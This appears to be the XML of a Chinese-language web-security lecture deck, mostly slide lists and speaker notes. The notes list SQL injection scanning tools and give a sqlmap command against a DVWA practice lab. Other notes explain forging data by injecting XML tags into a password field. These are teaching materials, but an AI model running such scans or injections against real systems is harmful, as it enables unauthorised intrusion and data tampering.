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876" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId73"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="297" r:id="rId4"/>
    <p:sldId id="267" r:id="rId5"/>
    <p:sldId id="268" r:id="rId6"/>
    <p:sldId id="298" r:id="rId7"/>
    <p:sldId id="299" r:id="rId8"/>
    <p:sldId id="300" r:id="rId9"/>
    <p:sldId id="301" r:id="rId10"/>
    <p:sldId id="302" r:id="rId11"/>
    <p:sldId id="303" r:id="rId12"/>
    <p:sldId id="305" r:id="rId13"/>
    <p:sldId id="304" r:id="rId14"/>
    <p:sldId id="306" r:id="rId15"/>
    <p:sldId id="307"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39" r:id="rId39"/>
    <p:sldId id="363" r:id="rId40"/>
    <p:sldId id="364" r:id="rId41"/>
    <p:sldId id="309" r:id="rId42"/>
    <p:sldId id="310" r:id="rId43"/>
    <p:sldId id="308" r:id="rId44"/>
    <p:sldId id="311" r:id="rId45"/>
    <p:sldId id="312" r:id="rId46"/>
    <p:sldId id="313" r:id="rId47"/>
    <p:sldId id="314" r:id="rId48"/>
    <p:sldId id="315" r:id="rId49"/>
    <p:sldId id="316" r:id="rId50"/>
    <p:sldId id="317" r:id="rId51"/>
    <p:sldId id="318" r:id="rId52"/>
    <p:sldId id="319" r:id="rId53"/>
    <p:sldId id="322" r:id="rId54"/>
    <p:sldId id="320" r:id="rId55"/>
    <p:sldId id="321" r:id="rId56"/>
    <p:sldId id="323" r:id="rId57"/>
    <p:sldId id="324" r:id="rId58"/>
    <p:sldId id="325" r:id="rId59"/>
    <p:sldId id="326" r:id="rId60"/>
    <p:sldId id="327" r:id="rId61"/>
    <p:sldId id="328" r:id="rId62"/>
    <p:sldId id="329" r:id="rId63"/>
    <p:sldId id="330" r:id="rId64"/>
    <p:sldId id="331" r:id="rId65"/>
    <p:sldId id="332" r:id="rId66"/>
    <p:sldId id="333" r:id="rId67"/>
    <p:sldId id="334" r:id="rId68"/>
    <p:sldId id="335" r:id="rId69"/>
    <p:sldId id="337" r:id="rId70"/>
    <p:sldId id="336" r:id="rId71"/>
    <p:sldId id="338" r:id="rId72"/>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540694"/>
    <a:srgbClr val="6807B9"/>
    <a:srgbClr val="0000CC"/>
    <a:srgbClr val="64C100"/>
    <a:srgbClr val="A60BFE"/>
    <a:srgbClr val="3D046C"/>
    <a:srgbClr val="FF9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97" autoAdjust="0"/>
    <p:restoredTop sz="86438" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="129" d="100"/>
          <a:sy n="129" d="100"/>
        </p:scale>
        <p:origin x="144" y="19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5" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="4472" y="4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notesMaster" Target="notesMasters/notesMaster1.xml"/><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AAC351C0-6D6D-4B39-8738-A7C7486B0710}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2017/10/3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4870BEF-24BB-4678-92B8-D9C03FCDED1A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22183208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98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72B6D8C-6458-4548-BD75-3CEE170667F7}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1297139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charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Weblnspect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> available at http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>www.hpenterprisesecurity.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQLDict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> available at http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ntsecuritv.nu</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Scrawlr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> available at https://h30406.www3.hp.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL Block Monitor available at http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sql-tools.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Vulnerability Scanner available at http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>www.acunetix.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>GreenSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Database Security available at http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>www.greensql.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft Code Analysis Tool .NET (CAT.NET) available at http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>www.microsoft.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NGS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQuirreL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Vulnerability Scanners available at http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>www.nccgroup.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WSSA - Web Site Security Scanning Service available at http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>www.beyondsecurity.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>N-Stalker Web Application Security Scanner available at http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>www.nstalker.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 用例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sqlmap.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -u "http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mydvwa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sqli_blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/?id=1&amp;Submit=Submit#" --cookie="security=low; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PHPSESSID=aa6nl9ac6g8vl8sm2gf9jerdg5"</a:t>
            </a:r>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2130035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15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2142867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41</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1168836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红色部分是普通用户的密码部分。要是普通用户需要更改密码了，应该是更改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>123</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这部分内容</a:t>
            </a:r>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1974545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正常来说，密码应该是简单字符，但我们可以写</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签来伪造其它数据。</a:t>
            </a:r>
          </a:p>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45</a:t>
            </a:fld>
